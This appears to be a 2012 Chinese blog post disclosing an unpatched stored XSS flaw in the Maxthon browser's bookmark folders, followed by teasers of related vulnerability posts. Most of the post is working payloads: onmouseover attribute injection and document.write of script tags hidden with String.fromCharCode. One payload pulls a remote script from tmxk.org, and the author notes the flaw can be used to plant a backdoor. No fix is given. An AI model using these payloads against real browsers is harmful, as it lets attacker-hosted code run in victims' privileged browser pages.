傲游浏览器xss 0day

遨游浏览器某功能才存在存储型xss。
可致留后门。
一时兴起,挖了一上午,找到了一个漏洞(本人傲游版本v3.3.9.1000)。
没给出exp,不过再花点时间,研究一下遨游的sandbox代码,就能写出来了。

遨游浏览器的收藏夹,容许用户建文件夹,我之前试了

">'><embed>
没效果,也没看源码就拉到了。今天兴起,看源码,是这样:
傲游浏览器xss 0day

于是新建文件夹

"> onmouseover='javascript:alert(/xss by tmxk.org</SPAN>/)'

傲游浏览器xss 0day

已经有了,怎么利用呢,
于是测试了容许最大长度,发现没限制。于是测试
发现没效果,

"> onmouseover=javascript:write("<script>alert()</script>")
哦这个转意了,于是,改变代码:

tmxk.org" onmouseover='javascript:write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,41,60,47,115,99,114,105,112,116,62)'
成功了。于是测试:

"> onmouseover=javascript:write("<script/src=//tmxk.org/q.js>")
同样变化代码,没有效果,纠结了一会儿,才明白//网址默认协议与当前页面协议一致,而遨游的属性页是mx://
于是这样写

"> onmouseover=javascript:write("<script src=http://tmxk.org/q.js></script>")
变换代码:

tmxk.org" onmouseover='javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))'
www.2cto.com

傲游浏览器xss 0day

傲游浏览器xss 0day

所有测试截图:

傲游浏览器xss 0day

修复方案:

你懂得,我还得挖掘。
作者 random_

分类:默认分类 时间:2012-01-13 人气:9
本文关键词:
分享到:

相关文章

  • JWPlayer 5最新SWF XSS 0day分析及POC改进 2012-02-22

    特别Thx 小雄同学的idea:) 老外在16号公布了jwplayer一个未修复的XSS 0day,详情猛戳这里。jwplayer是全球范围内目前应用最广泛的flash播放组件,特别是国外众多在线爱情动作片网站。此前jwplayer曾爆出过一个XSS漏洞,影响非常广泛。 根据老外的描述,这次的问题主要是因为之前一个XSS漏洞没有修复完全,导致bypass再利用。原始的问题是playerReady参数值未做过滤直接进入ExternalInterface.call导致可以执行任意JS代码。在经过官方

  • JWPlayer Xss 0day [Flash编程安全问题] 2012-05-14

    国外的一款播放器,使用网站数量超过百万,官方介绍:“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - is active on over one million websites and streams billions of videos each month.” 该FLASH版本视频播放器代码编写上

  • phpwind下flash xss 0day 2012-12-17

    最近好多大牛在提交flash相关的漏洞,我也来凑个热闹。 PHPWIND最新的版本使用的一处flash文件存在xss漏洞,pz牛和瘦子牛科普这么多,我就直接上报漏洞吧。 1、文件位置 http://www.phpwind.net/res/images/uploader.swf 2、通过对swf文件反编译得到as代码,查找“ExternalInterface.call”关键函数,在代码中多出使用了这个函数,比如: ExternalInterface.call((this.jsobject + ".

  • 一个flash的0day导致的淘宝网存储xss[续集] 2012-02-27

    今天看了 http://www.2cto.com/Article/201311/259981.html 这个帖子,思路挺有意思!狂顶赞!不过作为一个职业的马甲,看了下淘宝对这个漏洞的修复措施,发现修复并不彻底,提交下! 反编译了一下http://acjstb.aliyun.com/actionlog/flash/JSocket.swf这个文件。 淘宝的修复代码如下: public function getlso():String{ var _local1:SharedObject = Share

  • 一个flash的0day导致的淘宝网存储xss 2012-12-26

    淘宝的存储XSS,其实是利用了flash的0day,但预计很多网站都受影响... 关于flash的XSS,除了常见的一些技巧外,目前已知的比较偏门的两类是: 1.ExternalInterface.call的第二个参数,主要利用\",catch(e){}//,wooyun上有很多例子 2.在IE下,当flash调用ExternalInterface.addCallback时,如果object的id可控. 但需要注意的是:当js调用flash暴露出来的callback时,返回值也是一个敏感点!这个

  • 酷狗使用53kf造成xss(可能是53kf的一个0day) 2014-11-20

    酷狗使用53kf造成测漏(可能是53kf的一个0day)。 请帮我把前一个漏洞删除了。现在图片完整了。 1.jpg 当客服不在线的时候,打入xss代码,可成功打入。 当客服在线的时候,打进去没用。 我想知道,这个算不算是53kf的0day ??

  • ?在看我的噗?第一回:DOM沙盒 vs 跨?站?本漏洞(XSS) 2012-03-30

    来源:阿?外??/FONT> 上星期天下午,下大雨,?]法出去,?手?了Plurk,想到了Plurk之前公?的「XSS挑?稹?/FONT>,只要找到漏洞,?明?K回?蟮泥塾眩?陀?lurk hacker?煺驴梢阅茫??拔乙埠芸斓?A href="http://armorize-cht.blogspot.com/2009/05/plurktwittermyspace911.html">??了一?蠕?demo?K回??/FONT>。(不用?岩桑??然?]有真的拿?硎褂茫?/P

  • EasyTalk 微博本地文件包含漏洞0day及修复 2012-05-08

    漏洞描述:从源码上看,只需上传copy捆绑的木马即可正常包含。 漏洞文件在“wap/index.php”,关键代码如下: <?php error_reporting(7); define(IN_ET, TRUE); include(../include/etfunctions.func.php); include(../include/db_mysql.class.php); include(../config.inc.php); $db = new dbstuff; $db->co

  • 齐博CMS存储型XSS可getshell(组合利用) 2012-06-07

    齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas 前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,拿不出手,厂商也是无影响积极忽略的态度,后台提交表单基本都存在CSRF,如果能有一个前台的gets

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.108 (s). 10 q(s)